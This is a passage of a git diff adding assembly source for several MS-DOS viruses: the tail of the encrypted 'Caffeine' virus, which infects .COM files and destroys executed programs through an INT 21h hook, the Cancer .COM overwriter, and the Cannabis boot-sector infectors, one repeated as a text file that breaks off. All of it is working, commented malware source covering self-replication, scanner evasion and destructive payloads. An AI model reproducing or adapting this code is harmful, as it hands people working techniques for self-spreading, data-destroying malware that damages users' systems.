cx,virus_end-virus_start ; bytes to write + mov ah,40h ; 40hex! + int 21h + call decrypt ; decrypt virus again + ret + + crypt_value dw 0 + +decrypt: +encrypt: + + mov dx,word ptr [bp+crypt_value] ; simple xor-encryption + lea si,[bp+real_start] ; routine included to + mov cx,(virus_end-virus_start+1)/2 ; avoid detection by scanners. + +xor_word: + + xor word ptr [si],dx ; encrypt all of the code! + inc si + inc si + loop xor_word + ret + +real_start: + + mov di,100h ; transer the first three + lea si,[bp+orgbuf] ; bytes into a buffer + movsw + movsb + + lea dx,[bp+new_dta] ; set's the dta... + mov ah,1ah + int 21h + + mov ah,4eh ; find first file + +commm: lea dx,[bp+com_files] +next: int 21h + jnc foundfile + jmp chk_cond + +foundfile: + + mov ax,word ptr [bp+new_dta+16h] ; ask file-time + and al,00011111b + cmp al,00000010b ; compare second-value + jne infect ; not equal - infect! + + mov ah,4fh ; otherwise, search + jmp short commm ; next file in directory + +infect: + + lea dx,[bp+new_dta+1eh] ; clear file-attribute + xor cx,cx + mov ax,4301h + int 21h + + mov ax,3d02h ; open file + int 21h ; in read/write mode + + xchg ax,bx ; file handle in bx + + mov ah,3fh ; read 3 bytes + mov cx,3 ; from orgbuf + lea dx,[bp+orgbuf] + int 21h + + mov ax,4202h ; move file-pointer + xor cx,cx ; to end of file + cwd + int 21h + + cmp ax,666d ; check if file is + jb too_small ; too small + + cmp ax,64000d ; or too big + ja too_big ; to infect + + sub ax,3 + mov word ptr [bp+virus_start+1],ax ; create a new jump + mov word ptr [bp+newbuf+1],ax + + mov ah,2ch ; get random + int 21h ; value to use + mov word ptr [bp+crypt_value],dx ; as the xor + call write_virus ; value + + mov ax,4200h ; move file-pointer + xor cx,cx ; to tof of file + cwd + int 21h + + mov ah,40h ; write the new jump + lea dx,[bp+newbuf] ; + mov cx,3 + int 21h + +too_small: +too_big: + + mov dx,word ptr [bp+new_dta+18h] ; restore file's date + mov cx,word ptr [bp+new_dta+16h] ; and time and + and cl,11100000b ; mark the file + or cl,00000010b ; as infected + mov ax,5701h + int 21h + + mov ah,3eh ; close file + int 21h + + lea dx,[bp+new_dta+1eh] ; and put back + xor ch,ch ; the file-attributes + mov cl,byte ptr [bp+new_dta+15h] + mov ax,4301h + int 21h + +nextfile: + + mov ah,4fh ; seek next file + jmp next + +chk_cond: + + mov ah,2ch ; check if we should + int 21h ; make the pay-load + cmp dl,4d ; activate + jb resident + jmp short reset_dta + +newint21h proc far ; this code is memory resident + + cmp ax,4b00h ; check for execute + je create ; matched + jmp cs:oldint21h ; naaw +create: + mov ah,3ch ; truncate the file executed + int 21h ; and give it full-attribute + int 20h ; and just exit to dos + +newint21h endp + +in_mem: +resident: + + mov ax,3521h ; get original vector from + int 21h ; es:bx to int21h + + mov word ptr cs:oldint21h,bx + mov word ptr cs:oldint21h+2,es + + mov ax,2521h ; set a new interrupt vector + lea dx,[bp+offset newint21h] ; for int21h to ds:dx + int 21h + + lea dx,[bp+offset in_mem] ; and load it resident + int 27h + int 20h ; and exit + +reset_dta: + + mov dx,80h ; puts back the dta to normal + mov ah,1ah + int 21h + + mov ax,100h + jmp ax + +signature db "[Caffeine] (c) 1994 The Unforgiven/Immortal Riot" +com_files db '*.com',0 +orgbuf db 0cdh,20h,90h ; buffer to save first 3 bytes +newbuf db 0e9h,00h,00h ; buffer to calculate new entry +oldint21h dd 0 + +virus_end: +new_dta: +end v_start diff --git a/MSDOS/Virus.MSDOS.Unknown.cancer.asm b/MSDOS/Virus.MSDOS.Unknown.cancer.asm new file mode 100644 index 00000000..11686803 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cancer.asm @@ -0,0 +1,128 @@ + page ,132 + name CANCER + title Cancer - a mutation of the V-847 virus + .radix 16 +code segment + assume cs:code,ds:code + org 100 + +olddta equ 80 +virlen equ offset endcode - offset start +smalcod equ offset endcode - offset transf +buffer equ offset endcode + 100 +newdta equ offset endcode + 10 +fname = newdta + 1E +virlenx = offset endcode - offset start + +start: + jmp cancer + +ident dw 'VI' +counter db 0 +allcom db '*.COM',0 +vleng db virlen +n_10D db 3 ;Unused +progbeg dd ? +eof dw ? +handle dw ? + +cancer: + mov ax,cs ;Move program code + add ax,1000 ; 64K bytes forward + mov es,ax + inc [counter] + mov si,offset start + xor di,di + mov cx,virlen + rep movsb + + mov dx,newdta ;Set new Disk Transfer Address + mov ah,1A ;Set DTA + int 21 + mov dx,offset allcom ;Search for '*.COM' files + mov cx,110b ;Normal, Hidden or System + mov ah,4E ;Find First file + int 21 + jc done ;Quit if none found + +mainlp: + mov dx,offset fname + mov ax,3D02 ;Open file in Read/Write mode + int 21 + mov [handle],ax ;Save handle + mov bx,ax + push es + pop ds + mov dx,buffer + mov cx,0FFFF ;Read all bytes + mov ah,3F ;Read from handle + int 21 ;Bytes read in AX + add ax,buffer + mov cs:[eof],ax ;Save pointer to the end of file + + xor cx,cx ;Go to file beginning + mov dx,cx + mov bx,cs:[handle] + mov ax,4200 ;LSEEK from the beginning of the file + int 21 + jc close ;Leave this file if error occures + + mov dx,0 ;Write the whole code (virus+file) + mov cx,cs:[eof] ; back onto the file + mov bx,cs:[handle] + mov ah,40 ;Write to handle + int 21 + +close: + mov bx,cs:[handle] + mov ah,3E ;Close the file + int 21 + + push cs + pop ds ;Restore DS + mov ah,4F ;Find next matching file + mov dx,newdta + int 21 + jc done ;Exit if all found + jmp mainlp ;Otherwise loop again + +done: + mov dx,olddta ;Restore old Disk Transfer Address + mov ah,1A ;Set DTA + int 21 + + mov si,offset transf ;Move this part of code + mov cx,smalcod ;Code length + xor di,di ;Move to ES:0 + rep movsb ;Do it + + xor di,di ;Clear DI + mov word ptr cs:[progbeg],0 + mov word ptr cs:[progbeg+2],es ;Point progbeg at program start + jmp cs:[progbeg] ;Jump at program start + +transf: + push ds + pop es + mov si,buffer+100 + cmp [counter],1 + jne skip + sub si,200 +skip: + mov di,offset start + mov cx,0FFFF ;Restore original program's code + sub cx,si + rep movsb + mov word ptr cs:[start],offset start + mov word ptr cs:[start+2],ds + jmp dword ptr cs:[start] ;Jump to program start +endcode label byte + + int 20 ;Dummy program + int 20 ;??? + + db 0 ;Unused + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.cannab1.asm b/MSDOS/Virus.MSDOS.Unknown.cannab1.asm new file mode 100644 index 00000000..99c98bab --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cannab1.asm @@ -0,0 +1,231 @@ + +PAGE 59,132 + +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 +;圹 圹 +;圹 CANNAB1 圹 +;圹 圹 +;圹 Created: 4-Oct-91 圹 +;圹 Passes: 5 Analysis Options on: none 圹 +;圹 圹 +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 + +data_3e equ 43Fh +data_8e equ 5Ch +data_17e equ 46Ch ;* +data_18e equ 7C00h ;* +data_19e equ 7C0Bh ;* +data_20e equ 7D31h ;* +data_21e equ 7D35h ;* +data_22e equ 7D73h ;* +data_23e equ 7E00h ;* +data_24e equ 7E0Bh ;* + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +cannab1 proc far + +start: + mov dx,13Dh + dec byte ptr ds:data_8e + js loc_2 ; Jump if sign=1 + mov dx,155h + call sub_1 + xor ah,ah ; Zero register + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + and al,0DFh + cmp al,59h ; 'Y' + jne loc_ret_3 ; Jump if not equal + mov dl,0 + mov ah,0 + int 13h ; Disk dl=drive a ah=func 00h + ; reset disk, al=return status + jc loc_1 ; Jump if carry Set + mov dx,1E6h + call sub_1 + mov cx,1 + mov bx,offset data_12 + mov ax,301h + cwd ; Word to double word + int 13h ; Disk dl=drive a ah=func 03h + ; write sectors from mem es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + jnc loc_ret_3 ; Jump if carry=0 +loc_1: + mov dx,offset data_9+0B7h ; ('') + +cannab1 endp + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_1 proc near +loc_2: + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + +loc_ret_3: + retn +sub_1 endp + +data_9 db 'Usage: A:', 0Dh, 0Ah + db '$' + db 'You are about to install a VIRUS' + db ' on your diskette!!!', 0Dh, 0Ah, 'I' + db 'nsert a formatted 360K diskette ' + db 'into the drive.', 0Dh, 0Ah, 'Are' + db ' you sure you want to proceed (y' + db '/N)? $' + db 0Dh, 0Ah, 0Ah, 'Writing...$' + db 0Dh, 0Ah, 'Error !!!' + db 07h, 24h +data_12 db 0EBh + db 3Ch, 90h + db 'Cannabis' + db 0 + db 02h, 02h, 01h, 00h, 02h, 70h + db 00h,0D0h, 02h,0FDh, 02h, 00h + db 09h, 00h, 02h, 00h + db 34 dup (0) + db 0FAh, 33h,0C0h, 8Eh,0D8h, 8Eh + db 0D0h,0BCh, 00h, 7Ch,0FBh,0BBh + db 0B1h, 7Ch,0A1h, 4Ch, 00h, 3Bh + db 0C3h, 74h, 34h,0A3h, 31h, 7Dh + db 0A1h, 4Eh, 00h,0A3h, 33h, 7Dh + db 1Eh,0B8h, 10h, 00h, 8Eh,0D8h + db 0A1h, 13h, 03h, 48h, 48h,0A3h + db 13h, 03h, 1Fh,0B1h, 06h,0D3h + db 0E0h, 2Dh,0C0h, 07h, 8Eh,0C0h + db 0B9h, 00h, 02h,0BEh, 00h, 7Ch + db 8Bh,0FEh,0FCh,0F3h,0A4h, 89h + db 1Eh, 4Ch, 00h, 8Ch, 06h, 4Eh + db 00h + db 0F6h, 06h, 6Ch, 04h, 07h, 75h + db 08h + db 0BEh, 35h, 7Dh,0E8h, 0Eh, 00h +loc_6: + jmp short loc_6 +loc_7: + mov si,data_22e + call sub_2 + xor ax,ax ; Zero register + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + int 19h ; Bootstrap loader + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_2 proc near +loc_8: + lodsb ; String [si] to al + or al,al ; Zero ? + jz loc_ret_9 ; Jump if zero + mov ah,0Eh + mov bx,7 + int 10h ; Video display ah=functn 0Eh + ; write char al, teletype mode + jmp short loc_8 + +loc_ret_9: + retn +sub_2 endp + + push ax + push ds + cmp ah,4 + jae loc_10 ; Jump if above or = + cmp ah,2 + jb loc_10 ; Jump if below + test dl,0FEh + jnz loc_10 ; Jump if not zero + xor ax,ax ; Zero register + mov ds,ax + test byte ptr ds:data_3e,1 + jnz loc_10 ; Jump if not zero + call sub_3 +loc_10: + pop ds + pop ax + jmp dword ptr cs:data_20e + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_3 proc near + push cx + push bx + push di + push si + push es + mov di,2 +loc_11: + mov ah,2 + mov al,1 + mov bx,7E00h + mov cx,1 + push cs + pop es + pushf ; Push flags + call dword ptr cs:data_20e + jnc loc_12 ; Jump if carry=0 + xor ax,ax ; Zero register + pushf ; Push flags + call dword ptr cs:data_20e + dec di + jnz loc_11 ; Jump if not zero + jmp short loc_13 + db 90h +loc_12: + mov si,data_23e + mov di,data_18e + push cs + pop ds + cld ; Clear direction + mov cx,0Bh + repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] + jz loc_13 ; Jump if zero + mov si,data_24e + mov di,data_19e + mov cx,33h + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov ax,301h + mov bx,7C00h + mov cx,1 + pushf ; Push flags + call dword ptr cs:data_20e +loc_13: + pop es + pop si + pop di + pop bx + pop cx + retn +sub_3 endp + + db 0, 0, 0, 0 + db 0Dh, 0Ah, 'Hey man, I don', 27h, 't' + db ' wanna work. I', 27h, 'm too sto' + db 'ned right now...' + db 7 + db 0Dh, 0Ah, 0 + db 0Dh, 0Ah, 'Non-System disk or dis' + db 'k error', 0Dh, 0Ah, 'Replace and' + db ' press a key when ready', 0Dh, 0Ah + db 70 dup (0) + db 55h,0AAh + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.cannab2.asm b/MSDOS/Virus.MSDOS.Unknown.cannab2.asm new file mode 100644 index 00000000..1ebaf286 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cannab2.asm @@ -0,0 +1,278 @@ + +PAGE 59,132 + +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 +;圹 圹 +;圹 CANNAB2 圹 +;圹 圹 +;圹 Created: 7-Nov-91 圹 +;圹 Passes: 5 Analysis Options on: none 圹 +;圹 圹 +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 + +data_3e equ 43Fh +data_14e equ 5Ch +data_15e equ 78h +data_24e equ 7C0Bh ;* +data_25e equ 7C11h ;* +data_26e equ 7C13h ;* +data_27e equ 7C15h ;* +data_28e equ 7C16h ;* +data_29e equ 7C18h ;* +data_30e equ 7C20h ;* +data_31e equ 7C3Eh ;* +data_32e equ 7C49h ;* +data_33e equ 7C50h ;* +data_34e equ 7DABh ;* +data_35e equ 7DAFh ;* +data_36e equ 7E0Bh ;* + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +cannab2 proc far + +start: + mov dx,13Dh + dec byte ptr ds:data_14e + js loc_3 ; Jump if sign=1 + mov dx,155h + call sub_1 + xor ah,ah ; Zero register + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + and al,0DFh + cmp al,59h ; 'Y' + jne loc_ret_4 ; Jump if not equal + mov dl,0 + mov ah,0 + int 13h ; Disk dl=drive a ah=func 00h + ; reset disk, al=return status + jc loc_2 ; Jump if carry Set + mov dx,1E6h + call sub_1 + mov cx,1 + mov bx,offset data_20 + mov ax,301h + cwd ; Word to double word + int 13h ; Disk dl=drive a ah=func 03h + ; write sectors from mem es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + jnc loc_ret_4 ; Jump if carry=0 +loc_2: + mov dx,offset data_16+0B7h ; ('') + +cannab2 endp + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_1 proc near +loc_3: + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + +loc_ret_4: + retn +sub_1 endp + +data_16 db 'Usage: A:', 0Dh, 0Ah + db '$' + db 'You are about to install a VIRUS' + db ' on your diskette!!!', 0Dh, 0Ah, 'I' + db 'nsert a formatted 360K diskette ' + db 'into the drive.', 0Dh, 0Ah, 'Are' + db ' you sure you want to proceed (y' + db '/N)? $' + db 0Dh, 0Ah, 0Ah, 'Writing...$' + db 0Dh, 0Ah, 'Error !!!' + db 7 +data_19 db 24h +data_20 db 0EBh + db 3Ch, 90h + db 'CANNABIS' + db 00h, 02h, 02h, 01h, 00h, 02h + db 70h, 00h + db 0D0h, 02h,0FDh, 02h, 00h, 09h + db 00h, 02h, 00h + db 34 dup (0) + db 0FAh,0FCh, 33h,0C0h, 8Eh,0D8h + db 8Eh,0D0h,0BCh, 00h, 7Ch,0BBh + db 58h, 7Dh,0A1h, 4Ch, 00h, 3Bh + db 0C3h, 74h, 2Dh,0A3h,0ABh, 7Dh + db 0A1h, 4Eh, 00h,0A3h,0ADh, 7Dh + db 0BFh, 00h, 04h, 8Bh, 45h, 13h + db 48h, 89h, 45h, 13h,0B1h, 06h + db 0D3h,0E0h, 2Dh,0C0h, 07h, 8Eh + db 0C0h,0B9h, 00h, 02h, 8Bh,0F4h + db 8Bh,0FCh,0F3h,0A4h, 89h, 1Eh + db 4Ch, 00h, 8Ch, 06h, 4Eh, 00h + db 33h,0C0h, 16h, 07h + db 0BBh, 78h, 00h, 36h,0C5h, 37h + db 1Eh, 56h, 16h + db 53h + db 0BFh, 3Eh, 7Ch,0B9h, 0Bh, 00h + db 0F3h,0A4h, 06h, 1Fh,0C6h, 45h + db 0FEh, 0Fh, 8Bh, 0Eh, 18h, 7Ch + db 88h, 4Dh,0F9h, 89h, 47h, 02h + db 0C7h, 07h, 3Eh, 7Ch,0FBh,0CDh + db 13h, 72h, 48h, 33h,0C0h, 8Bh + db 0Eh, 13h, 7Ch, 89h, 0Eh, 20h + db 7Ch,0A1h, 16h, 7Ch,0D1h,0E0h + db 40h,0A3h, 50h, 7Ch,0A3h, 49h + db 7Ch,0A1h, 11h, 7Ch,0B1h, 04h + db 0D3h,0E8h, 01h, 06h, 49h, 7Ch + db 0BBh, 00h, 05h,0A1h, 50h, 7Ch + db 0E8h, 58h, 00h, 72h, 1Ch, 81h + db 3Fh, 49h, 4Fh, 75h, 09h, 81h + db 7Fh, 20h, 4Dh, 53h, 74h, 22h + db 0EBh + db 0Dh +loc_7: + cmp word ptr [bx],4249h + jne loc_8 ; Jump if not equal + cmp word ptr [bx+20h],4249h + je loc_9 ; Jump if equal +loc_8: + mov si,data_35e + call sub_3 + xor ax,ax ; Zero register + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + pop si + pop ds + pop word ptr [si] + pop word ptr [si+2] + int 19h ; Bootstrap loader +loc_9: + mov bx,700h + mov cx,3 + mov ax,word ptr ds:[7C49h] + +locloop_10: + call sub_2 + jc loc_8 ; Jump if carry Set + inc ax + add bx,offset data_19 + loop locloop_10 ; Loop if cx > 0 + + mov ch,byte ptr ds:[7C15h] + mov dl,0 + mov bx,word ptr ds:[7C49h] + mov ax,0 +;* jmp far ptr loc_1 ;* + db 0EAh, 00h, 00h, 70h, 00h + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_2 proc near + push ax + push cx + div byte ptr ds:[7C18h] ; al,ah rem = ax/data + cwd ; Word to double word + inc ah + shr al,1 ; Shift w/zeros fill + adc dh,0 + xchg ah,al + xchg ax,cx + mov ax,201h + int 13h ; Disk dl=drive ? ah=func 02h + ; read sectors to memory es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + pop cx + pop ax + +loc_ret_11: + retn +sub_2 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_3 proc near +loc_12: + lodsb ; String [si] to al + or al,al ; Zero ? + jz loc_ret_11 ; Jump if zero + mov ah,0Eh + mov bx,7 + int 10h ; Video display ah=functn 0Eh + ; write char al, teletype mode + jmp short loc_12 +sub_3 endp + + push ax + push ds + cmp ah,2 + jne loc_14 ; Jump if not equal + test dl,0FEh + jnz loc_14 ; Jump if not zero + xor ax,ax ; Zero register + mov ds,ax + test byte ptr ds:data_3e,1 + jnz loc_14 ; Jump if not zero + push cx + push bx + push di + push si + push es + mov ax,201h + mov bx,7E00h + mov cx,1 + push cs + push cs + pop es + pop ds + pushf ; Push flags + push cs + call sub_4 + jc loc_13 ; Jump if carry Set + mov si,data_36e + mov di,data_24e + mov cl,33h ; '3' + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov ax,301h + mov bx,7C00h + mov cl,1 + pushf ; Push flags + push cs + call sub_4 +loc_13: + pop es + pop si + pop di + pop bx + pop cx +loc_14: + pop ds + pop ax + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_4 proc near + jmp dword ptr cs:data_34e + db 0, 0, 0, 0 + db 0Dh, 0Ah, 'Non-System disk or dis' + db 'k error', 0Dh, 0Ah, 'Replace and' + db ' press a key when ready', 0Dh, 0Ah + db 10 dup (0) + db 55h,0AAh +sub_4 endp + + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.cannab2.txt b/MSDOS/Virus.MSDOS.Unknown.cannab2.txt new file mode 100644 index 00000000..9a8f6ce9 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cannab2.txt @@ -0,0 +1,278 @@ + +PAGE 59,132 + +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 +;圹 圹 +;圹 CANNAB2 圹 +;圹 圹 +;圹 Created: 7-Nov-91 圹 +;圹 Passes: 5 Analysis Options on: none 圹 +;圹 圹 +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 + +data_3e equ 43Fh +data_14e equ 5Ch +data_15e equ 78h +data_24e equ 7C0Bh ;* +data_25e equ 7C11h ;* +data_26e equ 7C13h ;* +data_27e equ 7C15h ;* +data_28e equ 7C16h ;* +data_29e equ 7C18h ;* +data_30e equ 7C20h ;* +data_31e equ 7C3Eh ;* +data_32e equ 7C49h ;* +data_33e equ 7C50h ;* +data_34e equ 7DABh ;* +data_35e equ 7DAFh ;* +data_36e equ 7E0Bh ;* + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +cannab2 proc far + +start: + mov dx,13Dh + dec byte ptr ds:data_14e + js loc_3 ; Jump if sign=1 + mov dx,155h + call sub_1 + xor ah,ah ; Zero register + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + and al,0DFh + cmp al,59h ; 'Y' + jne loc_ret_4 ; Jump if not equal + mov dl,0 + mov ah,0 + int 13h ; Disk dl=drive a ah=func 00h + ; reset disk, al=return status + jc loc_2 ; Jump if carry Set + mov dx,1E6h + call sub_1 + mov cx,1 + mov bx,offset data_20 + mov ax,301h + cwd ; Word to double word + int 13h ; Disk dl=drive a ah=func 03h + ; write sectors from mem es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + jnc loc_ret_4 ; Jump if carry=0 +loc_2: + mov dx,offset data_16+0B7h ; ('') + +cannab2 endp + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_1 proc near +loc_3: + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + +loc_ret_4: + retn +sub_1 endp + +data_16 db 'Usage: A:', 0Dh, 0Ah + db '$' + db 'You are about to install a VIRUS' + db ' on your diskette!!!', 0Dh, 0Ah, 'I' + db 'nsert a formatted 360K diskette ' + db 'into the drive.', 0Dh, 0Ah, 'Are' + db ' you sure you want to proceed (y' + db '/N)? $' + db 0Dh, 0Ah, 0Ah, 'Writing...$' + db 0Dh, 0Ah, 'Error !!!' + db 7 +data_19 db 24h +data_20 db 0EBh + db 3Ch, 90h + db 'CANNABIS' + db 00h, 02h, 02h, 01h, 00h, 02h + db 70h, 00h + db 0D0h, 02h,0FDh, 02h, 00h, 09h + db 00h, 02h, 00h + db 34 dup (0) + db 0FAh,0FCh, 33h,0C0h, 8Eh,0D8h + db 8Eh,0D0h,0BCh, 00h, 7Ch,0BBh + db 58h, 7Dh,0A1h, 4Ch, 00h, 3Bh + db 0C3h, 74h, 2Dh,0A3h,0ABh, 7Dh + db 0A1h, 4Eh, 00h,0A3h,0ADh, 7Dh + db 0BFh, 00h, 04h, 8Bh, 45h, 13h + db 48h, 89h, 45h, 13h,0B1h, 06h + db 0D3h,0E0h, 2Dh,0C0h, 07h, 8Eh + db 0C0h,0B9h, 00h, 02h, 8Bh,0F4h + db 8Bh,0FCh,0F3h,0A4h, 89h, 1Eh + db 4Ch, 00h, 8Ch, 06h, 4Eh, 00h + db 33h,0C0h, 16h, 07h + db 0BBh, 78h, 00h, 36h,0C5h, 37h + db 1Eh, 56h, 16h + db 53h + db 0BFh, 3Eh, 7Ch,0B9h, 0Bh, 00h + db 0F3h,0A4h, 06h, 1Fh,0C6h, 45h + db 0FEh, 0Fh, 8Bh, 0Eh, 18h, 7Ch + db 88h, 4Dh,0F9h, 89h, 47h, 02h + db 0C7h, 07h, 3Eh, 7Ch,0FBh,0CDh + db 13h, 72h, 48h, 33h,0C0h, 8Bh + db 0Eh, 13h, 7Ch, 89h, 0Eh, 20h + db 7Ch,0A1h, 16h, 7Ch,0D1h,0E0h + db 40h,0A3h, 50h, 7Ch,0A3h, 49h + db 7Ch,0A1h, 11h, 7Ch,0B1h, 04h + db 0D3h,0E8h, 01h, 06h, 49h, 7Ch + db 0BBh, 00h, 05h,0A1h, 50h, 7Ch + db 0E8h, 58h, 00h, 72h, 1Ch, 81h + db 3Fh, 49h, 4Fh, 75h, 09h, 81h + db 7Fh, 20h, 4Dh, 53h, 74h, 22h + db 0EBh + db 0Dh +loc_7: + cmp word ptr [bx],4249h + jne loc_8 ; Jump if not equal + cmp word ptr [bx+20h],4249h + je loc_9 ; Jump if equal +loc_8: + mov si,data_35e + call sub_3 + xor ax,ax ; Zero register + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + pop si + pop ds + pop word ptr [si] + pop word ptr [si+2] + int 19h ; Bootstrap loader +loc_9: + mov bx,700h + mov cx,3 + mov ax,word ptr ds:[7C49h] + +locloop_10: + call sub_2 + jc loc_8 ; Jump if carry Set + inc ax + add bx,offset data_19 + loop locloop_10 ; Loop if cx > 0 + + mov ch,byte ptr ds:[7C15h] + mov dl,0 + mov bx,word ptr ds:[7C49h] + mov ax,0 +;* jmp far ptr loc_1 ;* + db 0EAh, 00h, 00h, 70h, 00h + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_2 proc near + push ax + push cx + div byte ptr ds:[7C18h] ; al,ah rem = ax/data + cwd ; Word to double word + inc ah + shr al,1 ; Shift w/zeros fill + adc dh,0 + xchg ah,al + xchg ax,cx + mov ax,201h + int 13h ; Disk dl=drive ? ah=func 02h + ; read sectors to memory es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + pop cx + pop ax + +loc_ret_11: + retn +sub_2 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_3 proc near +loc_12: + lodsb ; String [si] to al + or al,al ; Zero ? + jz loc_ret_11 ; Jump if zero + mov ah,0Eh + mov bx,7 + int 10h ; Video display ah=functn 0Eh + ; write char al, teletype mode + jmp short loc_12 +sub_3 endp + + push ax + push ds + cmp ah,2 + jne loc_14 ; Jump if not equal + test dl,0FEh + jnz loc_14 ; Jump if not zero + xor ax,ax ; Zero register + mov ds,ax + test byte ptr ds:data_3e,1 + jnz loc_14 ; Jump if not zero + push cx + push bx + push di + push si + push es + mov ax,201h + mov bx,7E00h + mov cx,1 + push cs + push cs + pop es + pop ds + pushf ; Push flags + push cs + call sub_4 + jc loc_13 ; Jump if carry Set + mov si,data_36e + mov di,data_24e + mov cl,33h ; '3' + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov ax,301h + mov bx,7C00h + mov cl,1 + pushf ; Push flags + push cs + call sub_4 +loc_13: + pop es + pop si + pop di + pop bx + pop cx +loc_14: + pop ds + pop ax + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_4 proc near + jmp dword ptr cs:data_34e + db 0, 0, 